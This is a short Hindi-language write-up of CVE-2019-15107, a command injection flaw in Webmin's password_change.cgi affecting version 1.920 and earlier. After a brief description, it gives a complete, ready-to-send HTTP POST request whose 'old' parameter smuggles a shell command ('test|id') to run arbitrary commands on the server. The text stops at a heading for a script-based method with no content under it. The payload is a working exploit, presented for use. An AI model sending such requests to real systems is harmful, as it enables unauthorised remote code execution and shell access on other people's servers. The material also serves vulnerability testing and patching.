CVE-2019-15107: Exploit Modules Available for Remote Code Execution Vulnerability in Webmin
- भेद्यता विवरण
Webmin एक शक्तिशाली वेब-आधारित सिस्टम प्रबंधन उपकरण है, जो Unix सिस्टम में व्यापक रूप से उपयोग किया जाता है। Webmin में Password_Change.cgi अनुरोध प्राप्त करने की प्रक्रिया में, old पैरामीटर में कमांड इंजेक्शन भेद्यता है, जिसका दुरुपयोग हमलावर द्वारा किया जा सकता है। जब उपयोगकर्ता Webmin पासवर्ड रीसेट सुविधा चालू करता है, तो हमलावर इस भेद्यता का उपयोग करके कमजोर सिस्टम पर मनमाने कमांड निष्पादित कर सकता है, और फिर सिस्टम शेल प्राप्त कर सकता है।
प्रभावित संस्करण:
Webmin 1.920 और निचले संस्करण
- भेद्यता का शोषण
विधि 1: मैन्युअल जांच
पृष्ठ पर जाएं, प्रमाणपत्र को अनदेखा करने के बाद Webmin का लॉगिन पृष्ठ दिखाई देगा

निम्नलिखित पैकेट भेजें, और id कमांड निष्पादित करें:
POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60
user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

विधि 2: स्क्रिप्ट का उपयोग करना
